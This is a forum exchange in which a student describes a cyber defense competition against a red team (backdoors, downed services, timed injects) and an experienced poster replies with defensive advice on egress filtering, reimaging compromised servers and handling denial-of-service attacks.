One person per device seemed to work well, but don't do a designated person for injects as it's a waste of a person. Just have one person handle that (somebody who doesn't do a ton else like Debian email or something) and watch them. They are one of the largest points portion of the competition. The way it works is basically you get assigned a task (install this program or upgrade this service or something like that), and have a time limit to complete it. These are worth pretty big points, and upon completion will get another inject most likely building upon the first one.
Interesting scenario. I had no idea...
The red team stated after that one of the biggest issues was poor firewall/router rules. These need to be rock solid on inbound and outbound traffic. One issue we had from this was that the router/firewall were blocking legit traffic from inside.
In my opinion, the most secure organizations could not possibly update a server directly from the box. That's bad practice for bastion services that are likely to be attacked. A server should only be able to communicate on critical ports and environments I see in the real world where this is the case tend to be the most secure. You should not lose points for that, period (in my opinion). I even recommended previously that egress filtering should be sharply restricted. I am an advocate of any sane security practice employing change windows where firewalls are opened temporarily on a weekly (or less often) basis for doing updates and then closed again. A Web server should be able to make NO outbound connections that were not initiated by an external host. Period. That is best practice.
One thing the red team did, and perhaps SecurityTheatre can elaborate, is in the first hour or so they basically installed backdoors on the systems that would scan the system for open ports and then send out packets to the red team that these ports are used so they could connect to them.
It sounds like these are pretty standard revere-TCP backdoors, but HOW did they install them? Properly configured and hardened services on the back side of a reasonable firewall are
NOT trivial to just drop shell code on. This is a huge gap in the explanation, do you have any more information? This is where the compromise happened. Once a box is compromised, the industry standard practice is to drop the box completely, backup the data and restore it from a known clean image. Teaching the "cleaning" of a critical server system is a misnomer that encourages bad security practices.
They didn't seem too concerned with password hacking/cracking, however they will compromise these. Do not use easy passwords.
In a real enterprise, passwords and password hashes are a fundamental security issue and are possibly THE fundamental security issue. It's fair to point out that in many cases, one doesn't need to crack the passwords in many types of systems, and that having root/admin access to the box itself is enough to compromise many of its neighbours.
Another big issue we had was keeping services up. Out of the 7 or so monitored, we could only ever get a max of 4 services up and quite often only one or two were up if any at all. The web server for the last few hours was "flapping" and going on and off for a while and I don't know why. They brought down my FTP server about 3 hours in (after fighting back and forth with them for a bit), and I could never find out what they did or how to bring it back up as I was too busy with injects.
So they were actively running denial of service attacks against services? Did you have any sort of IDS/IPS engaged? In a real-world scenario, DoS attacks are often met by a blunt force, restricting incoming traffic in bulk. It's often pretty easy to work out where the traffic is coming from by looking at all incoming traffic, splitting it in half and just blocking it outright, and then working your way forward until you determine exact IPs. If they are known attacks, a modern IPS will do this for you. I presume they didn't have some really unique 0-day code for this type of thing.
The competition looks for services to be up, and the red team just tries to bring them down. They don't really get on to the network and try to gain control over the servers per se, but they will do things to allow them to easily regain access to systems if you fix the hole that was there initially.
That's a boring test.
The DoS attacks are neat and all, but are self-limiting and are just a matter of sheer manpower in identifying and combating. In a real-world environment, DoS attacks are seldom ranked more than a "Medium" on our severity rating scale, with "High" and "Critical" reserved for remote compromise and massive information disclosure.
I'm sure there is a lot more, but those are the main points that I got from it.
Once again thank you for all your help, you helped us from placing in 5th I'm sure
Meh, it sounds like my advice was targeted toward a different aim than the scoring of this competition. Keeping services up at all costs is actually slightly contrary to "real security", if you ask me. From a strategic standpoint, a company needs to be prepared to take a bit of short term pain and drop their entire link for a few hours if they are under targeted attack to prevent a much more damaging information disclosure in the long term, especially if there is evidence of a backdoor being installed on any internal services.
Frankly, Sony eventually did the right thing back in the spring when they finally got their head around the idea of pulling the entire network offline and re-architecting it from scratch in a new data center. The battle of keeping services up and fighting with attackers is just not a viable approach, especially as they gradually worm further into the system and threaten the compromise the identity and financials of millions of people.
Better luck next year, eh?
Congrats on 4th anyway, fwiw.